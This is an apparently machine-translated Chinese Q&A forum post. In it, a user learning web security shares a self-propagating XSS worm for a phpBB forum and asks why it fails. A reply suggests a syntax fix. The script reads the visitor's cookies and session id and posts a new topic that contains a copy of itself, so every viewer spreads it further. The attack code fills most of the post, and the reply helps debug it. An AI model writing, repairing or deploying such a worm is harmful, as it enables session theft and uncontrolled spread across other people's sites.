我试图了解有关互联网安全的更多信息,并且正在编写一个自我传播的蠕虫(用于未经过无限制的输入)。这是我到目前为止的脚本
<script id=worm>
var wormstr="<script>";
wormstr.concat(document.getElemntByID("worm").innerHTML);
wormstr.concat("</scr");
wormstr.concat("ipt>");
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST", "http://www.xssphpbb.com/posting.php", true);
Ajax.setRequestHeader("Host","www.sxxphpbb.com");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie", document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
var sid=document.cookie.match('sid=([^;]*)')[1];
var content="subject=XSS&addbbcode18=%23444444&addbbcode20=0&helpbox=Tip%3A+Styles+can+be+applied+quickly+to+selected+text.&message=";
content=content.concat(wormstr);
content=content.concat("&add_poll_option_text=&poll_length=&mode=newtopic&sid="+sid+"&f=1&post=Submit");
alert(content); //for debugging
Ajax.send(content);
</script>
当我在我的服务器上的评论部分中运行此代码时,它会创建一个新评论,但该评论只是";content=content.concat(wormstr);content=content.concat("
此代码用于创建新注释并将其自身作为脚本插入到该注释中。因此,如果有人访问原始帖子,他们将创建一个新的相同评论。如果有人访问其中一个生成的帖子,它将作为原始帖子,并在其中创建一个新的评论。
答案 0 :(得分:0)
wormstr.concat("ipt");似乎缺少结束>? ,导致下一行的语法错误
当我在我的服务器上的评论部分内运行此代码时 创建一个新的评论但该评论只是
";content=content.concat(wormstr);content=content.concat("